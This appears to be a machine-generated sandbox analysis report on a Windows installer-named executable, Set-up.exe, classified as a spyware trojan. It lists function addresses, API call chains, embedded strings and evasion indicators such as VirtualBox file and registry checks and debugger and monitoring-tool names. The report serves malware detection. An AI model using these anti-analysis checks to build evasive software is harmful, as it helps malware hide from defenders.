    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00308AC00_2_00308AC0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0046CB000_2_0046CB00
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_003D0B700_2_003D0B70
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00340B600_2_00340B60
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0011CBB00_2_0011CBB0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00488BF00_2_00488BF0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_002FABC00_2_002FABC0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00476BB00_2_00476BB0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0049CC900_2_0049CC90
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00494D400_2_00494D40
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00484D500_2_00484D50
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0048CD800_2_0048CD80
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001C2DC00_2_001C2DC0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0040CE300_2_0040CE30
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0042AE300_2_0042AE30
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00276E900_2_00276E90
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00238F200_2_00238F20
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00134F700_2_00134F70
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001DEF900_2_001DEF90
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00436F800_2_00436F80
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00462F900_2_00462F90
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_002FAFC00_2_002FAFC0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_003130200_2_00313020
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0046F0100_2_0046F010
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_002EF0400_2_002EF040
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_003011000_2_00301100
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_002311400_2_00231140
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_002E11900_2_002E1190
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_002ED1D00_2_002ED1D0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0029D2300_2_0029D230
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001AB2D00_2_001AB2D0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_002973100_2_00297310
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0048B3800_2_0048B380
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_003B33F00_2_003B33F0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_002FB3F00_2_002FB3F0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_002334500_2_00233450
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0047D4300_2_0047D430
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0047F4300_2_0047F430
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_002EB4B00_2_002EB4B0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004874A00_2_004874A0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004635C00_2_004635C0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_002FF5B00_2_002FF5B0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0017F5B00_2_0017F5B0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004755E00_2_004755E0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0011D5C00_2_0011D5C0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004835B00_2_004835B0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004796500_2_00479650
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004656D00_2_004656D0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_003B36A00_2_003B36A0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0048B6F00_2_0048B6F0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004496B00_2_004496B0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0018D7400_2_0018D740
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0045B7200_2_0045B720
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004877300_2_00487730
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004737E00_2_004737E0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_002997900_2_00299790
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004857800_2_00485780
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_003097D00_2_003097D0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004A17A00_2_004A17A0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001B77E00_2_001B77E0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001BB8400_2_001BB840
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0029F8500_2_0029F850
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001C98800_2_001C9880
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0048D8E00_2_0048D8E0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0047D8900_2_0047D890
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0027B9000_2_0027B900
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_003D39600_2_003D3960
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004699200_2_00469920
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_002ED9E00_2_002ED9E0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0047B9900_2_0047B990
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0032FA100_2_0032FA10
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00493A700_2_00493A70
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_002D9A100_2_002D9A10
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_002B9A500_2_002B9A50
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00461B500_2_00461B50
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001EBB500_2_001EBB50
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0048BB100_2_0048BB10
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00481BD00_2_00481BD0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0046DB800_2_0046DB80
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00151BE00_2_00151BE0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00267C700_2_00267C70
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0037DC6C0_2_0037DC6C
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_002EFC500_2_002EFC50
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00477CC00_2_00477CC0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00297CA00_2_00297CA0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00281D300_2_00281D30
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 001550A0 appears 34 times
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 002C7120 appears 45 times
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 001175A0 appears 365 times
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 002C7220 appears 776 times
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 002ECA40 appears 98 times
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00154FD0 appears 120 times
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00154F40 appears 148 times
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 001F44A0 appears 43 times
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 001171E0 appears 33 times
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00498B80 appears 31 times
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 0011CAA0 appears 37 times
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 002EA170 appears 58 times
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 002ECBC0 appears 501 times
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 001173F0 appears 62 times
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 002EC9B0 appears 97 times
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00229720 appears 40 times
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 002EE710 appears 31 times
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 002C7310 appears 44 times
    Source: Set-up.exeStatic PE information: invalid certificate
    Source: Set-up.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
    Source: Set-up.exeBinary string: Lntdll.dllNtCreateFileNtDeviceIoControlFileNtCancelIoFileEx\Device\Afd
    Source: classification engineClassification label: mal84.troj.spyw.evad.winEXE@1/0@9/2
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0012D090 GetLastError,_errno,__sys_nerr,__sys_errlist,FormatMessageW,wcstombs,strchr,strlen,strcpy,strrchr,strrchr,_errno,GetLastError,SetLastError,_errno,_errno,GetLastError,0_2_0012D090
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0011255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64,0_2_0011255D
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001129FF FindFirstFileA,FindFirstFileA,RegOpenKeyExA,RegOpenKeyExA,GetModuleFileNameA,CharUpperA,CharUpperA,strstr,CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,OpenProcess,QueryFullProcessImageNameA,QueryFullProcessImageNameA,CharUpperA,CloseHandle,CloseHandle,strstr,CreateToolhelp32Snapshot,Process32First,strncpy,_strlwr_s,strstr,strstr,strstr,strstr,CloseHandle,Process32Next,CloseHandle,CloseHandle,EnumWindows,EnumWindows,GetTickCount64,0_2_001129FF
    Source: C:\Users\user\Desktop\Set-up.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
    Source: Set-up.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\Set-up.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: Set-up.exeVirustotal: Detection: 33%
    Source: Set-up.exeReversingLabs: Detection: 28%
    Source: Set-up.exeString found in binary or memory: set-addPolicy
    Source: Set-up.exeString found in binary or memory: in-addr.arpa
    Source: Set-up.exeString found in binary or memory: t xml:space=.gif" border="0"</body> </html> overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script> /favicon.ico" />operating system" style="width:1target="_blank">State Universitytext-align:left; document.write(, including the around t
    Source: Set-up.exeString found in binary or memory: Unable to complete request for channel-process-startup
    Source: Set-up.exeString found in binary or memory: id-cmc-addExtensions
    Source: Set-up.exeString found in binary or memory: iphlpapi.dllif_nametoindexkernel32LoadLibraryExA\/AddDllDirectorysystem_win32.c@
    Source: Set-up.exeString found in binary or memory: in-addr.arpa
    Source: Set-up.exeString found in binary or memory: 8L0123456789abcdefin-addr.arpaip6.arpa
    Source: Set-up.exeString found in binary or memory: Unable to complete request for channel-process-startup
    Source: Set-up.exeString found in binary or memory: JM[\Unable to allocate space for channel dataFailed allocating memory for channel type nameUnable to allocate temporary space for packetWould block sending channel-open requestUnable to send channel-open requestWould blockUnexpected errorUnexpected packet sizeChannel open failure (administratively prohibited)Channel open failure (connect failed)Channel open failure (unknown channel type)Channel open failure (resource shortage)Channel open failureUnable to allocate memory for setenv packetcancel-tcpip-forwardWould block sending forward requestUnable to send global-request packet for forward listen requestauth-agent-req@openssh.comauth-agent-reqcdChannel can not be reusedUnable to allocate memory for channel-process requestWould block sending channel requestUnable to send channel requestFailed waiting for channel successUnable to complete request for channel-process-startupUnexpected packet lengthUnable to allocate memory for signal nameWould block sending window adjustUnable to send transfer-window adjustment packet, deferringtransport readwould blockWe have already closed this channelEOF has already been received, data might be ignoredFailure while draining incoming flowUnable to send channel dataUnable to send EOF, but closing channel anywayWould block sending close-channelUnable to send close-channel request, but closing anywaysessionchannel.cUnable to allocate memory for direct-tcpip connectiondirect-tcpipUnable to allocate memory for direct-streamlocal connectiondirect-streamlocal@openssh.comQR0.0.0.0tcpip-forwardWould block sending global-request packet for forward listen requestUnknownUnable to allocate memory for listener queueUnable to complete request for forward-listenWould block waiting for packetChannel not foundcdenvWould block sending setenv requestUnable to send channel-request packet for setenv requestFailed getting response for channel-setenvUnable to complete request for channel-setenvcdWould block sending auth-agent requestUnable to send auth-agent requestFailed to request auth-agentUnable to complete request for auth-agentcdterm + mode lengths too largepty-reqWould block sending pty requestUnable to send pty-request packetFailed to require the PTY packageUnable to complete request for channel request-ptywindow-changeWould block sending window-change requestUnable to send window-change packetcdUnable to allocate memory for pty-requestx11-reqMIT-MAGIC-COOKIE-1Unable to get random bytes for x11-req cookie%02XWould block sending X11-req packetUnable to send x11-req packetwaiting for x11-req response packetUnable to complete request for channel x11-reqWould block sending EOFUnable to send EOF on channelReceiving channel window has been exhausted_libssh2_transport_read() bailed out!libssh2_channel_wait_closed() invoked when channel is not in EOF stateUnable to allocate memory for signal requestsignalWould block sending signal requestUnable to send signal packetecdsa-sha2-nistp256ecdsa-sha2-nistp384ecdsa-sha2-nistp521blocksize <= siz
    Source: Set-up.exeString found in binary or memory: id-cmc-addExtensions
    Source: Set-up.exeString found in binary or memory: set-addPolicy
    Source: Set-up.exeString found in binary or memory: overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script>
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: napinsp.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wshbth.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: winrnr.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: windowscodecs.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: napinsp.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wshbth.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: winrnr.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: Set-up.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
    Source: Set-up.exeStatic file information: File size 7745160 > 1048576
    Source: Set-up.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x52a800
    Source: Set-up.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x151c00
    Source: Set-up.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001114E0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,0_2_001114E0
    Source: Set-up.exeStatic PE information: section name: .eh_fram
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_015A0709 push esp; retf 0_3_015A0711
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_015A0709 push esp; retf 0_3_015A0711
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_015A0709 push esp; retf 0_3_015A0711
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_015A0730 push eax; ret 0_3_015A0731
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_015A0730 push eax; ret 0_3_015A0731
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_015A0730 push eax; ret 0_3_015A0731
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_015A4728 push ebx; ret 0_3_015A4729
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_015A4728 push ebx; ret 0_3_015A4729
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_015A4728 push ebx; ret 0_3_015A4729
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_015A20D3 pushfd ; iretd 0_3_015A2151
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_015A20D3 pushfd ; iretd 0_3_015A2151
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_015A20D3 pushfd ; iretd 0_3_015A2151
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_015A0709 push esp; retf 0_3_015A0711
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_015A0709 push esp; retf 0_3_015A0711
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_015A0709 push esp; retf 0_3_015A0711
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_015A0730 push eax; ret 0_3_015A0731
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_015A0730 push eax; ret 0_3_015A0731
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_015A0730 push eax; ret 0_3_015A0731
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_015A4728 push ebx; ret 0_3_015A4729
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_015A4728 push ebx; ret 0_3_015A4729
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_015A4728 push ebx; ret 0_3_015A4729
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_015A20D3 pushfd ; iretd 0_3_015A2151
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_015A20D3 pushfd ; iretd 0_3_015A2151
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_015A20D3 pushfd ; iretd 0_3_015A2151
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_015A0709 push esp; retf 0_3_015A0711
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_015A0709 push esp; retf 0_3_015A0711
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_015A0709 push esp; retf 0_3_015A0711
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_015A0730 push eax; ret 0_3_015A0731
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_015A0730 push eax; ret 0_3_015A0731
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_015A0730 push eax; ret 0_3_015A0731
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_015A4728 push ebx; ret 0_3_015A4729

    Malware Analysis System Evasion

    barindex
    Contain functionality to detect virtual machines
    Source: C:\Users\user\Desktop\Set-up.exeCode function: C:\Windows\System32\VBox*.dll vbox_first SYSTEM\ControlSet001\Services\VBoxSF vbox_second 0_2_001129FF
    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
    Source: Set-up.exeBinary or memory string: PROCMON.EXE
    Source: Set-up.exeBinary or memory string: X64DBG.EXE
    Source: Set-up.exeBinary or memory string: WINDBG.EXE
    Source: Set-up.exeBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
    Source: Set-up.exeBinary or memory string: WIRESHARK.EXE
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_002F9980 rdtsc 0_2_002F9980
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001129FF FindFirstFileA,FindFirstFileA,RegOpenKeyExA,RegOpenKeyExA,GetModuleFileNameA,CharUpperA,CharUpperA,strstr,CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,OpenProcess,QueryFullProcessImageNameA,QueryFullProcessImageNameA,CharUpperA,CloseHandle,CloseHandle,strstr,CreateToolhelp32Snapshot,Process32First,strncpy,_strlwr_s,strstr,strstr,strstr,strstr,CloseHandle,Process32Next,CloseHandle,CloseHandle,EnumWindows,EnumWindows,GetTickCount64,0_2_001129FF
    Source: C:\Users\user\Desktop\Set-up.exeAPI coverage: 7.2 %
    Source: C:\Users\user\Desktop\Set-up.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0011255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64,0_2_0011255D
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001129FF FindFirstFileA,FindFirstFileA,RegOpenKeyExA,RegOpenKeyExA,GetModuleFileNameA,CharUpperA,CharUpperA,strstr,CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,OpenProcess,QueryFullProcessImageNameA,QueryFullProcessImageNameA,CharUpperA,CloseHandle,CloseHandle,strstr,CreateToolhelp32Snapshot,Process32First,strncpy,_strlwr_s,strstr,strstr,strstr,strstr,CloseHandle,Process32Next,CloseHandle,CloseHandle,EnumWindows,EnumWindows,GetTickCount64,0_2_001129FF
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_002EE270 _errno,FindNextFileW,WideCharToMultiByte,strlen,_errno,calloc,MultiByteToWideChar,MultiByteToWideChar,_errno,GetLastError,MultiByteToWideChar,wcscpy,FindFirstFileW,free,_errno,0_2_002EE270
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0011255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64,0_2_0011255D
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0011255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64,0_2_0011255D
    Source: Set-up.exeBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
    Source: Set-up.exe, 00000000.00000003.1766598511.0000000001593000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1766768289.0000000001597000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1768219322.00000000015AD000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1766658323.0000000001596000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1766831207.00000000015AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll": 1932 }, { "name": "svchost.exe", "pid": 2064 }, { "name": "svchost.exe", "pid": 2152 }, { "name": "svchost.exe", "pid": 2216 }, { "name": "svchost.exe", "pid": 2268 }, { "name": "svchost.exe", "pid": 2388 }, { "name": "svchost.exe", "pid": 2396 }, { "name": "svchost.exe", "pid": 2508 }, { "name": "svchost.exe", "pid": 2528 }, { "name": "OfficeClickToRun.exe", "pid": 2552 }, { "name": "svchost.exe", "pid": 2608 }, { "name": "svchost.exe", "pid": 2616
    Source: Set-up.exeBinary or memory string: Hyper-V RAW
    Source: Set-up.exeBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
    Source: Set-up.exe, 00000000.00000003.1679622239.0000000001387000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFsion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}00000FF1CE}\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}
    Source: Set-up.exe, 00000000.00000003.1678980798.0000000001543000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Users\user\Desktop\Set-up.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_002F9980 rdtsc 0_2_002F9980
